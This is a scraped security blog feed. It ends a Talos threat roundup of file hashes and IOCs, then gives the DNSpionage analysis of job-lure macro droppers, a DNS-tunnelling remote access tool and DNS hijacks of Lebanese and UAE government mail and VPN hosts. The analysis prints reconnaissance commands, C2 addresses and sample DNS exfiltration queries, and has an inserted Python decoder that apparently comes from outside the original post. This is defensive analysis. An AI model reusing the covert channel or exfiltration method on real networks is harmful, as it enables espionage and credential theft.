src="https://3.bp.blogspot.com/-KX19-P0orPg/XAGQNvnNGzI/AAAAAAAABNo/RxtoGJUud6wJsU31kG3zR2bgR5TGY3ocwCLcBGAs/s400/4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-HLR_udS_PDE/XAGQWo0PcMI/AAAAAAAABNw/QNHehKcbgdAwts9H854YUgQzh--NbaOdACLcBGAs/s1600/13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-HLR_udS_PDE/XAGQWo0PcMI/AAAAAAAABNw/QNHehKcbgdAwts9H854YUgQzh--NbaOdACLcBGAs/s640/13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; 
text-align: center;"><a href="https://3.bp.blogspot.com/-m7g-LcjEeDg/XAGQd9tZczI/AAAAAAAABN0/RGc-7yYmlogNyaZsKQzuSqJs3E77r-9PgCLcBGAs/s1600/6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://3.bp.blogspot.com/-m7g-LcjEeDg/XAGQd9tZczI/AAAAAAAABN0/RGc-7yYmlogNyaZsKQzuSqJs3E77r-9PgCLcBGAs/s640/6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f_umbrella.png" width="640" /></a></div><b><br /></b><b><br /></b><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-yZJ2VdnpnY8/XAGQisQKhaI/AAAAAAAABN8/CwYQBmhbj-0x6NK8ILBpUYO7zst-CC1agCLcBGAs/s1600/54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-yZJ2VdnpnY8/XAGQisQKhaI/AAAAAAAABN8/CwYQBmhbj-0x6NK8ILBpUYO7zst-CC1agCLcBGAs/s640/54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee_malware.png" width="640" /></a></div><br /><h3>Win.Virus.Triusor-6757540-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\RegAsm.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\ilasm.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\jsc.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\ngen.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\vbc.exe</li></ul><b>File Hashes</b><br /><ul><li>0bc3007209f850ac764646065dcc8fdd85c46425dc98d72631e51045ba36069c</li><li>14bc92fb1cb50fc6ffd2f34b701e57603fb99b96130c7e5b77187c2c3684a4db</li><li>249ac287cada8bab59c445a286a8edb645f58035681c788687979c17d7eb766f</li><li>3822de7241c17afa298071ab05ea0552456c7b9e78f2655b3471554f972520cf</li><li>3adbbb8794d8244bbc905ad9b7d54046e494374f1856447fd174869911f8ebd2</li><li>68d400f36ef0ac8869499a0185fc52a7d22add5a137fcdd9d73b7e47d8514049</li><li>6a897eacea0f1a6773d19c6b1dbd101db860e3f8df547d97392c98a6aef0cce5</li><li>6b34a29fcdf2ad7a74859ba38c3a622971c1bbdb6a1268d5c766fac441b9970d</li><li>8cee25864d734f6624754ba68d47d0d6573ce6d4ca55c2cf3025a1435bf84685</li><li>8f4bd4d1d9d337cfd8ffd0afe80213ae90063d274aad64b04aa8558b837218e6</li><li>9df2784ba1fd594ab90357d799b26e0fa3abca65a5744ce3d62993d74b0f7e0f</li><li>9e76c9877cb6820ff88937ee158cd59cbe16b9eb26526f0f1ec39d09601dca05</li><li>a3168cb7b3fd30eed135ba086e9e96984f56fd52317d185f3e988176440a5a25</li><li>db6317729cabcb31a4be51a3cc281bffc5dd38a8164861c4d7fe7a0be386f892</li><li>dc8c46a57c38955f4b6356d29662beeb0f88eeca50a94191df8892efab3bfc2e</li><li>ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
src="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-P3adklAetxk/XAGQtnQA8JI/AAAAAAAABOI/ZoIZYjsyycQ7aJ-Jgjl8Q4thN8MIy29ywCLcBGAs/s1600/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-P3adklAetxk/XAGQtnQA8JI/AAAAAAAABOI/ZoIZYjsyycQ7aJ-Jgjl8Q4thN8MIy29ywCLcBGAs/s400/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Pdzr3cMwDkA/XAGQx6t5J-I/AAAAAAAABOM/ZzYZhyBahHkJ5ng1fc7iYkeWzg1fn5SBACLcBGAs/s1600/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="962" height="320" src="https://2.bp.blogspot.com/-Pdzr3cMwDkA/XAGQx6t5J-I/AAAAAAAABOM/ZzYZhyBahHkJ5ng1fc7iYkeWzg1fn5SBACLcBGAs/s640/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_tg.png" width="640" /></a></div><br /><br />
2018-12-13T14:20:42.472-05:000
https://blog.talosintelligence.com/2018/11/threat-roundup-1123-1130.html

DNSpionage Campaign Targets Middle East
http://feedproxy.google.com/~r/feedburner/Talos/~3/CD6ENIVNHU4/dnspionage-campaign-targets-middle-east.html
APT, DNS, DNS redirection, DNSpionage, Lebanon, Middle East, RAT, UAE
noreply@blogger.com (Paul Rascagneres)
Tue, 27 Nov 2018 07:02:00 PST
tag:blogger.com,1999:blog-1029833275466591797.post-8790671249786498861
<div dir="ltr" style="text-align: left;" trbidi="on"><i>This blog post was authored by <a href="https://twitter.com/securitybeard">Warren Mercer</a> and <a href="https://twitter.com/r00tbsd">Paul Rascagneres</a>.</i><br /><i><br /></i><i>Update 2018-11-27 15:30:00 EDT: A Russian-language document has been removed. Subsequent analysis leads us to believe it is unrelated to this investigation.</i><br /><br /><h2 id="h.f50nw968t1yl">Executive Summary</h2><br />Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuously as possible during their attacks.<br /><br />Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers.<br /><br />In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. Let's Encrypt provides X.509 certificates for TLS free of charge to the user. 
We don't know at this time if the DNS redirections were successful.<br /><br />In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.<br /><br /><br /><a name='more'></a><br /><br /><h2 id="h.bck4uuvi3s9a">Infection vectors</h2><h3 id="h.sb7i209nv50n">Fake job websites</h3><br />The attackers' first attempt to compromise the user involved two malicious websites that mimicked legitimate sites that host job listings:<br /><br /><ul><li>hr-wipro[.]com (with a redirection to wipro.com)</li><li>hr-suncor[.]com (with a redirection to suncor.com)</li></ul><br />These sites hosted a malicious Microsoft Office document: hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc.<br /><br />The document is a copy of a legitimate file available on the website for Suncor Energy, a Canadian sustainable energy company, and contains a malicious macro.<br /><br />At this time, we don't know how the target received these links. 
The attackers most likely sent the malicious document via email as part of a spear-phishing campaign, but it also could have circulated via social media platforms, such as LinkedIn, in an attempt to legitimize the opportunity for a new job.<br /><br /><h3 id="h.ydshmkxxgfvn">Malicious Office document</h3><br />Upon opening the first Office document, the user receives a message that says "Content Mode Available:"<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-5tYMN-kz4Rs/W_0-Xk9LRpI/AAAAAAAAAlA/qoYntm4inrAAs619zf8aLtm-lVUg5DzFQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="978" data-original-width="1422" height="440" src="https://3.bp.blogspot.com/-5tYMN-kz4Rs/W_0-Xk9LRpI/AAAAAAAAAlA/qoYntm4inrAAs619zf8aLtm-lVUg5DzFQCLcBGAs/s640/image3.png" width="640" /></a></div><h3 id="h.o18wrhokj3qi">Macros used</h3><br />The macros of the analysed samples can be divided into two steps:<br /><ol><li>When the document is opened, the macro will decode a PE file encoded with base64 and will drop it in %UserProfile%\.oracleServices\svshost_serv.doc</li><li>When the document is closed, the macro will rename the file "svshost_serv.doc" to "svshost_serv.exe." Then, the macro creates a scheduled task named "chromium updater v 37.5.0" in order to execute the binary. The scheduled task is executed immediately and repeatedly every minute.</li></ol>The purpose of these two steps is to avoid sandbox detection.<br /><br />The payload is executed when Microsoft Office is closed, meaning it requires human interaction to deploy it. 
The macros, while recoverable through analysis, are password-protected in Microsoft Word to stop the victim from examining the macro code via Microsoft Office.<br /><br />Additionally, the macro uses classic string obfuscation to evade string-based detection:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-FHq5hpKX-Qw/W_0-tS2uBkI/AAAAAAAAAlM/JHdctOeFHJUy7P19jrRnrroYzsFnrTT-gCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="210" data-original-width="885" height="150" src="https://3.bp.blogspot.com/-FHq5hpKX-Qw/W_0-tS2uBkI/AAAAAAAAAlM/JHdctOeFHJUy7P19jrRnrroYzsFnrTT-gCLcBGAs/s640/image6.png" width="640" /></a></div><br />The "schedule.service" string is created by concatenation. The final payload is a remote administration tool that we named "DNSpionage."<br /><br /><h2 id="h.w4a1sqa5d0ex">DNSpionage malware</h2><br /><h3 id="h.nvook3g0pv4m">Malware analysis</h3><br />The malware dropped by the malicious document is an undocumented remote administration tool. 
We are naming it DNSpionage because it supports DNS tunneling as a covert channel to communicate with the attackers' infrastructure.<br /><br />DNSpionage creates its own files and directories under the directory it runs from:<br /><pre>%UserProfile%\.oracleServices/<br />%UserProfile%\.oracleServices/Apps/<br />%UserProfile%\.oracleServices/Configure.txt<br />%UserProfile%\.oracleServices/Downloads/<br />%UserProfile%\.oracleServices/log.txt<br />%UserProfile%\.oracleServices/svshost_serv.exe<br />%UserProfile%\.oracleServices/Uploads/<br /></pre>The Downloads directory is used by the attackers to store additional scripts and tools downloaded from the C2 server.<br /><br />The Uploads directory is used by the attacker to temporarily store files before exfiltrating them to the C2 server.<br /><br />The log.txt file contains logs in plain text.<br /><br />All the executed commands can be logged in this file, which also contains the results of those commands.<br /><br />The last file is Configure.txt. As expected, this file contains the malware configuration. The attackers can specify a custom command and control (C2) server URL, a URI and a domain that serves as a DNS covert channel. Additionally, the attackers can specify a custom base64 alphabet for obfuscation. We discovered that the attackers used a custom alphabet for each target.<br /><br />All the data is transferred in JSON. That's why a large part of the code of the malware is the JSON library.<br /><br /><h3 id="h.gno7m7t3wc6v">Communication Channels</h3><br />The malware uses HTTP and DNS in order to communicate with the C2 server.<br /><br /><h4 id="h.f5i6wa64yjl4">HTTP mode</h4><br />A DNS request (to 0ffice36o[.]com) is performed with random data encoded with base64. This request registers the infected system and receives the IP of an HTTP server (185.20.184.138 during the investigation). 
An example of a DNS request:<br /><pre>yyqagfzvwmd4j5ddiscdgjbe6uccgjaq[.]0ffice36o[.]com<br /></pre>The malware is also able to craft DNS requests that provide the attacker with further information. Here is an example of such a request:<br /><pre>oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com<br /></pre>In this context, the first four characters are randomly generated by the malware using rand(). The rest of the label is base32-encoded; once decoded, the value is 1Fy2048. "Fy" is the target ID and "2048" (0x800) means "Config file not found". The request is performed if the configuration file could not be retrieved on the infected machine. This message is used to inform the attacker.<br /><br />The malware performs an initial HTTP request to retrieve its configuration at hxxp://IP/Client/Login?id=Fy.<br /><br />This request will be used to create the configuration file, particularly to set the custom base64 dictionary.<br /><br />The second HTTP request is hxxp://IP/index.html?id=XX (where "XX" is the ID for the infected system).<br /><br />The purpose of this request is to retrieve the orders. 
The site is a fake Wikipedia page:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-hk-m0hXlJw0/W_0-zGxE9FI/AAAAAAAAAlU/OLvyay94AfIFNPK04uaFDtgt-X000qTxgCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1102" data-original-width="1385" height="508" src="https://1.bp.blogspot.com/-hk-m0hXlJw0/W_0-zGxE9FI/AAAAAAAAAlU/OLvyay94AfIFNPK04uaFDtgt-X000qTxgCLcBGAs/s640/image1.png" width="640" /></a></div><br />The commands are included in the source code of the page:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-lb9IUZ5_i3U/W_0-3nq6EAI/AAAAAAAAAlY/acYgjzX_08QC85r00SN4jVvS2menwsvUQCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="1600" height="136" src="https://2.bp.blogspot.com/-lb9IUZ5_i3U/W_0-3nq6EAI/AAAAAAAAAlY/acYgjzX_08QC85r00SN4jVvS2menwsvUQCLcBGAs/s640/image5.png" width="640" /></a></div><br />In this example, the commands are encoded with a standard base64 algorithm because we did not receive a custom alphabet. 
Here is another example with a custom alphabet in the configuration file:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-vJnuTC3ej3k/W_0-7bj6O-I/AAAAAAAAAlc/TFQ-ypr-FXwvxqdQ8vr3UXN9Gb8O-OdGQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="369" data-original-width="1600" height="146" src="https://3.bp.blogspot.com/-vJnuTC3ej3k/W_0-7bj6O-I/AAAAAAAAAlc/TFQ-ypr-FXwvxqdQ8vr3UXN9Gb8O-OdGQCLcBGAs/s640/image7.png" width="640" /></a></div><br />Here are the three commands automatically sent to the compromised system:<br /><br /><ul><li>{"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}</li><li>{"c": "hostname", "i": "-5000", "t": -1, "k": 0}</li><li>{"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}</li></ul><br />The malware generates the following snippet of code after executing those commands:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/--Egf_wHM3Bk/W_0_ANlKCJI/AAAAAAAAAlk/ZqrP_jXp5dEvSF39Q68h3qvcforOWz87gCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="573" data-original-width="1600" height="228" src="https://2.bp.blogspot.com/--Egf_wHM3Bk/W_0_ANlKCJI/AAAAAAAAAlk/ZqrP_jXp5dEvSF39Q68h3qvcforOWz87gCLcBGAs/s640/image8.png" width="640" /></a></div><br />The attackers ask for the username, the hostname and the infected user's domain. The first step is clearly a reconnaissance phase. The data is eventually sent to hxxp://IP/Client/Upload.<br /><br />Finally, CreateProcess() executes the commands, and their output is redirected back to the malware through a pipe created with CreatePipe().<br /><br /><h4 id="h.vasiujhglmyl">DNS mode</h4><br />The malware also supports a DNS-only mode. In this mode, the orders and answers are handled via DNS. 
This option is dictated within the configure.txt file on the infected machine. Using DNS can make it easier to send information back to the attacker, as the DNS protocol will generally bypass any proxies or web filtering in place.<br /><br />First, the malware initiates a DNS query to ask for orders, for example:<br /><pre>RoyNGBDVIAA0[.]0ffice36o[.]com <br /></pre>The first four characters must be ignored; as mentioned earlier in the article, these are randomly generated characters, and the relevant data is GBDVIAA0. The decoded value (base32) is "0GT\x00". GT is the target ID and \x00 the request number. The C2 server replies to the DNS request with an IP address; whilst not always a valid IP, it is perfectly acceptable to the DNS protocol, for example 0.1.0.3. We believe the first value (0x0001) is the command ID for the next DNS request and 0x0003 is the size of the command.<br /><br />Secondly, the malware performs a DNS query with the command ID:<br /><pre>t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 =&gt; "0GT\x01")<br /></pre>The C2 server will return a new IP: 100.105.114.0. If we convert the value to ASCII we have "dir\x00", the command to be executed.<br /><br />Finally, the result of the executed command will be sent by multiple DNS requests:<br /><pre>gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -&gt; GJDVIAJAKZXWY000 -&gt; "2GT\x01 Vol"<br />TwGHGJDVIATVNVSSA000.0ffice36o[.]com -&gt; GJDVIATVNVSSA000 -&gt; "2GT\x02ume"<br />1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -&gt; GJDVIA3JNYQGI000 -&gt; "2GT\x03in d"<br />iucCGJDVIBDSNF3GK000.0ffice36o[.]com -&gt; GJDVIBDSNF3GK000 -&gt; "2GT\x04rive"<br />viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -&gt; GJDVIBJAIMQGQ000 -&gt; "2GT\x05 C h"<br />[...]<br /></pre><h2 id="h.fw0ryjuar49t">Victimology</h2>Thanks to the DNS exfiltration and Cisco Umbrella, we are able to identify the origin of some of the victims and the period of activity in October and November. 
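The labels quoted in the C2 and DNS-mode sections are what a resolver log retains, and decoding them is what makes the victim identification possible. The decoder below is an added example, not Talos tooling: it strips the four random characters, restores the base32 padding that the malware writes as "0", splits the result into target ID and payload, reads the two reply-address encodings, and reassembles chunked command output. Reading the leading decoded byte as a message kind (0 order request, 1 status, 2 output) is this example's inference from the samples, not something the post states.

```python
"""Decoder for the DNSpionage DNS channel described above.

Added example, not Talos tooling.  Sample labels and reply addresses are
the ones quoted in the post; the C2 domain is written undefanged so the
parser sees what a resolver log would contain.
"""
import base64
import ipaddress
import re
from dataclasses import dataclass

# Status value quoted in the post (sent as decimal text in the beacon).
STATUS_CODES = {0x800: "Config file not found"}


@dataclass(frozen=True)
class Message:
    # Leading byte read as a message kind: "0" order request, "1" status,
    # "2" command output.  This is the example's inference from the samples.
    kind: str
    target_id: str   # two-character victim ID ("Fy", "GT")
    payload: bytes   # everything after the target ID


def decode_label(label: str) -> bytes:
    """Decode the first label of a DNSpionage query name.

    The first four characters are rand() output and are discarded (they may
    themselves contain '0', e.g. "t0qI", so strip before touching padding).
    The rest is standard base32 whose '=' padding is written as '0'; '0' is
    outside the base32 alphabet (A-Z, 2-7), so the substitution is unambiguous.
    """
    body = label[4:]
    if not re.fullmatch(r"[A-Z2-7]+0*", body):
        raise ValueError(f"not a DNSpionage-style label: {label!r}")
    return base64.b32decode(body.replace("0", "="))


def parse_query(fqdn: str) -> Message:
    """Split 'oGjBGFDHSMRQGQ4HY000.0ffice36o.com' into kind, target ID, payload."""
    raw = decode_label(fqdn.split(".")[0])
    if len(raw) < 3:
        raise ValueError("decoded message too short")
    return Message(chr(raw[0]), raw[1:3].decode("ascii"), raw[3:])


def status_code(msg: Message) -> int:
    """Status beacons carry the code as decimal digits (b'2048...' -> 0x800);
    any bytes after the digit run are ignored."""
    digits = re.match(rb"\d+", msg.payload)
    if msg.kind != "1" or digits is None:
        raise ValueError("not a status beacon")
    return int(digits.group())


def parse_order_reply(ip: str) -> tuple:
    """Reply to an order request, e.g. '0.1.0.3' -> (1, 3): per the post the
    first 16 bits are the command ID for the next query, the last 16 the size."""
    packed = ipaddress.IPv4Address(ip).packed
    return int.from_bytes(packed[:2], "big"), int.from_bytes(packed[2:], "big")


def parse_command_reply(ip: str) -> str:
    """Reply carrying the command text, e.g. '100.105.114.0' -> 'dir'
    (ASCII in the four octets, NUL-padded)."""
    packed = ipaddress.IPv4Address(ip).packed
    return packed.split(b"\x00", 1)[0].decode("ascii")


def reassemble_output(fqdns: list) -> dict:
    """Rebuild exfiltrated command output from kind-'2' queries.

    Each query carries a one-byte chunk number and up to four bytes of
    output; chunks are grouped per target ID and ordered by number, so
    log lines seen out of order still reassemble correctly.
    """
    chunks = {}
    for fqdn in fqdns:
        msg = parse_query(fqdn)
        if msg.kind != "2" or not msg.payload:
            continue
        chunks.setdefault(msg.target_id, {})[msg.payload[0]] = msg.payload[1:]
    return {tid: b"".join(parts[n] for n in sorted(parts)).decode("ascii", "replace")
            for tid, parts in chunks.items()}


# The exfiltration queries quoted in the post, deliberately out of order.
OUTPUT_QUERIES = [
    "1QMUGJDVIA3JNYQGI000.0ffice36o.com",
    "gLtAGJDVIAJAKZXWY000.0ffice36o.com",
    "viLxGJDVIBJAIMQGQ000.0ffice36o.com",
    "TwGHGJDVIATVNVSSA000.0ffice36o.com",
    "iucCGJDVIBDSNF3GK000.0ffice36o.com",
]

if __name__ == "__main__":
    beacon = parse_query("oGjBGFDHSMRQGQ4HY000.0ffice36o.com")
    print(beacon.target_id, STATUS_CODES.get(status_code(beacon)))  # Fy Config file not found
    print(parse_query("t0qIGBDVIAI0.0ffice36o.com"))                # kind '0', target 'GT', b'\x01'
    print(parse_order_reply("0.1.0.3"), parse_command_reply("100.105.114.0"))  # (1, 3) dir
    print(reassemble_output(OUTPUT_QUERIES))                        # {'GT': ' Volume in drive C h'}
```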
Here is the graph for 0ffice36o[.]com, the C2 domain mentioned above:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-mVwc-SLms4k/W_0_RmZ9EQI/AAAAAAAAAl0/5qJgmGT-ikUANqulMLUkb3mTbf7F7i6_QCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="253" data-original-width="1600" height="100" src="https://4.bp.blogspot.com/-mVwc-SLms4k/W_0_RmZ9EQI/AAAAAAAAAl0/5qJgmGT-ikUANqulMLUkb3mTbf7F7i6_QCLcBGAs/s640/image2.png" width="640" /></a></div><br />The queries were performed from Lebanon and UAE. This information is confirmed by the DNS redirection described in the next section.<br /><br /><h2 id="h.ffkyygju1anl">DNS redirection</h2><br /><h3 id="h.3sqcfrk4c11o">Introduction</h3><br />Talos discovered three IPs linked to the DNSpionage domain:<br /><br /><ul><li>185.20.184.138</li><li>185.161.211.72</li><li>185.20.187.8</li></ul><br />The three IPs are hosted by DeltaHost.<br /><br />The last one was used in a DNS redirection attack between September and November. Multiple nameservers belonging to the public sector in Lebanon and UAE, as well as some companies in Lebanon, were apparently compromised, and hostnames under their control were pointed to attacker-controlled IP addresses. The attackers redirected the hostnames to the IP 185.20.187.8 for a short time. Just before each redirection, the attackers created a certificate matching the domain name with the Let's Encrypt service.<br /><br />In this section, we will present all the DNS redirection instances we identified and the attacker-generated certificates associated with each. We don't know if the redirection attack was ultimately successful, or what exact purpose the DNS redirection served. However, the impact could be significant, as the attackers were able to intercept all traffic destined for these hostnames during this time. 
Because the attackers targeted email and VPN traffic specifically, the redirections may have been used to harvest additional information, such as email and/or VPN credentials.<br /><br />As incoming email would also be arriving at the attackers' IP address, if multi-factor authentication was in use, the attackers could obtain MFA codes to abuse. Since the attackers were able to access email, they could carry out additional attacks or even blackmail the target.<br /><br />The DNS redirection we identified occurs in multiple locations where there is no direct correlation of infrastructure, staff, or job routines. It also occurs in both the public and private sectors. Therefore, we believe it was not human error, nor a mistake by an administrative user within any of the impacted organisations. This was a deliberate, malicious attempt by the attackers to redirect DNS.<br /><br /><h3 id="h.60gximskz3tj">Lebanon government redirection</h3><br />Talos identified that the Finance Ministry of Lebanon's email domain was the victim of a malicious DNS redirection.<br /><br /><ul><li>webmail.finance.gov.lb was redirected to 185.20.187.8 on Nov. 6 at 06:19:13 GMT. On the same date, at 05:07:25, a <a href="https://crt.sh/?id=922787324">Let's Encrypt certificate</a> was created.</li></ul><h3 id="h.lcbzpycqanre">UAE government redirection</h3><br />UAE public domains were targeted, as well. We identified the domains below, belonging to a law enforcement body (a VPN and a college) and to the Telecommunication Regulatory Authority.<br /><br /><ul><li>adpvpn.adpolice.gov.ae redirected to 185.20.187.8 on Sept. 13 at 06:39:39 GMT. On the same date, at 05:37:54, a <a href="https://crt.sh/?id=741047630">Let's Encrypt certificate</a> was created.</li><li>mail.mgov.ae redirected to 185.20.187.8 on Sept. 15 at 07:17:51 GMT. A <a href="https://crt.sh/?id=804429558">Let's Encrypt certificate</a> was also created at 06:15:51 GMT.</li><li>mail.apc.gov.ae redirected to 185.20.187.8 on Sept. 24. 
A <a href="https://crt.sh/?id=820893483">Let's Encrypt certificate</a> was also created at 05:41:49 GMT.</li></ul><h3 id="h.9ijynb4emvti">Middle East Airline redirection</h3><br />Talos discovered that Middle East Airlines (MEA), a Lebanese airline, was also the victim of DNS redirection.<br /><br /><ul><li>memail.mea.com.lb redirected to 185.20.187.8 on Nov. 14 at 11:58:36 GMT.<br />On Nov. 6, at 10:35:10 GMT, a <a href="https://crt.sh/?id=923463031">Let's Encrypt certificate</a> was created.</li></ul><br /><br />This certificate contains subject alternative names (SANs), an X.509 certificate extension that lets a single TLS certificate cover multiple DNS names:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-5x-QPlYuA3s/W_0_XMqAk9I/AAAAAAAAAl4/nBvAZ9V8Tr0-8RutKGWfPKo2a2eLoUFgQCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1077" data-original-width="754" height="640" src="https://1.bp.blogspot.com/-5x-QPlYuA3s/W_0_XMqAk9I/AAAAAAAAAl4/nBvAZ9V8Tr0-8RutKGWfPKo2a2eLoUFgQCLcBGAs/s640/image9.png" width="448" /></a></div><ul><li>memail.mea.com.lb</li><li>autodiscover.mea.com.lb</li><li>owa.mea.com.lb</li><li>www.mea.com.lb</li><li>autodiscover.mea.aero</li><li>autodiscover.meacorp.com.lb</li><li>mea.aero</li><li>meacorp.com.lb</li><li>memailfr.meacorp.com.lb</li><li>meoutlook.meacorp.com.lb</li><li>tmec.mea.com.lb</li></ul><br />These names show a clear understanding of the victim's domains, which leads us to believe the attacker was active in these environments to understand the specific domains and certificates they would be required to produce.<br /><br /><h2 id="h.uc73snt7y6xd">Conclusion</h2><br />Our investigation discovered two events: the DNSpionage malware and a DNS redirection campaign. 
In the case of the malware campaign, we don't know the exact target, but we do know the attackers went after users in Lebanon and the UAE. However, as outlined above, we were able to uncover the targets of the redirect campaign.<br /><br />We are highly confident that both of these campaigns came from the same actor. However, we do not know much about the location of the actors and their exact motivations. It is clear that this threat actor was able to redirect DNS from government-owned domains in two different countries over the course of two months, as well as a national Lebanese airline. They were able to operate at the system level, using Windows malware, as well as at the network level, using DNS exfiltration and redirection. It is unclear if these DNS redirection attacks were successful, but the attackers have kept up their efforts, launching five attacks so far this year, including one in the past two weeks.<br /><br />Users should use these campaigns as proof that both their endpoint protection and their network protection need to be as strong as possible. 
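On the network side, the pattern documented in the DNS redirection section (a hostname's answer moving to an address outside the owner's ranges, with a certificate for that name issued shortly beforehand) can be checked against passive DNS and Certificate Transparency data. The script below is an added example, not Talos tooling: the owner ranges and pre-redirect answers are constructed TEST-NET values, while the redirect and certificate timestamps are the ones reported above.

```python
"""Flag hostnames whose DNS answer moves outside the owner's address space,
and attach any certificate issued for that name shortly before the change
(the pattern in the redirection section: a Let's Encrypt certificate about an
hour before each redirect, eight days before in the MEA case).

Added example, not Talos tooling.  Owner ranges and pre-redirect answers are
constructed TEST-NET values; redirect and certificate times are the post's.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class DnsObservation:
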